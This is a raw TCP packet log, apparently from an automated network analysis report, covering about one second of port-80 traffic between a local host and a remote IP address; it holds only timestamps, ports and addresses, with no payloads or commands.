                                                                                                                                                                Nov 15, 2024 10:28:16.497863054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.498003006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.498020887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.498034000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.498045921 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.498056889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.498080969 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.498120070 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.498135090 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.504286051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.504358053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.504368067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.504415989 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.504426956 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.504440069 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.504451036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.504471064 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.504497051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.510256052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.510274887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.510284901 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.510368109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.524452925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.524497986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.524506092 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.524539948 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.524584055 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.524591923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.525023937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.525068045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.525130987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.525141954 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.525185108 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.535677910 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.535702944 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.535715103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.535747051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.535831928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.535844088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.535888910 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.578572989 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.578684092 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.578746080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621083975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621129990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621182919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621212959 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.621217012 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621241093 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.621256113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621289968 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.621311903 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.627898932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.627957106 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.627974987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.628009081 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.628042936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.628065109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.628086090 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.628139973 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.633510113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.633543968 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.633580923 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.633635044 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.647891998 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.647922039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.647933960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.647962093 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.647996902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.648175001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.648185968 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.648222923 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.648336887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.648346901 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.648381948 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.658893108 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.658957958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.658993959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.659012079 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.659029007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.659066916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.659074068 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.659209967 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.659240007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.659260035 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.708093882 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.743360043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.743437052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.743473053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.743489981 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.743509054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.743542910 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.743552923 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.743581057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.743623018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.751041889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751108885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751121044 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751133919 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751144886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751169920 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.751211882 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.751549006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751560926 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751571894 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.751605988 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.751655102 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.756819963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.756874084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.756905079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.756934881 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.771294117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.771354914 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.771359921 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.771392107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.771470070 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.771544933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.771579981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.771615028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.771629095 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.782083988 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.782156944 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.782166958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.782202959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.782239914 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.782252073 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.782373905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.782403946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.782421112 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.822762966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.822788954 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.822973013 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.864331007 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.868053913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.868103981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.868140936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.868164062 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.868175030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.868213892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.868221045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.874315977 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874373913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874380112 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.874409914 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874455929 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.874495983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874526024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874561071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874568939 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.874629021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874675989 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.874680996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874716997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874749899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.874757051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.879940987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.879976034 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.880002022 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.880009890 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.880060911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.894460917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.894495010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.894530058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.894632101 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.894845963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.894927025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.894961119 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.895016909 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.895016909 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.905204058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.905256987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.905289888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.905323029 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.905323982 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.905359983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.905391932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.905531883 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.905531883 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.945821047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.945915937 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.945949078 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.945983887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.946017981 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.946067095 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.989654064 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.989700079 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.989756107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.989785910 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.989794970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.989835024 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.990998030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.991034985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.991072893 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.991086960 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.997384071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997420073 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997443914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.997453928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997503996 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.997533083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997566938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997615099 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.997620106 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997656107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.997704029 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:16.998183966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.998235941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:16.998290062 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.003153086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.003190994 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.003225088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.003245115 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.017411947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.017447948 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.017479897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.017488956 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.017533064 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.017920017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.017954111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.017987013 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.018002987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.028500080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.028553963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.028590918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.028624058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.028659105 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.028676033 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.028850079 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.069166899 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.069221020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.069262028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.069305897 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.112862110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.112904072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.112941980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.112977028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.113162994 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.114058018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.114110947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.114134073 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.114187002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.114216089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.114243984 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.120932102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.120984077 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.120987892 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.121021032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.121054888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.121072054 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.121092081 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.121141911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.121318102 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.121351957 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.121387959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.121397018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.126487017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.126523018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.126547098 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.126559019 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.126595974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.126610994 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.126796007 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.126825094 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.126841068 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.140722990 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.140790939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.140825033 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.140875101 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.141100883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.141140938 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.141155958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.141190052 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.141202927 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.151778936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.151833057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.151834011 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.151869059 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.151904106 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.151920080 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.151938915 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.151993036 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.192534924 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.192584038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.192744970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.236068010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.236143112 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.236181021 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.236299038 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.237400055 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.237452984 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.237464905 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.237490892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.237525940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.237540007 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.237647057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.237677097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.237699032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:17.244124889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244184017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:17.244190931 CET4973680192.168.2.4150.241.95.163
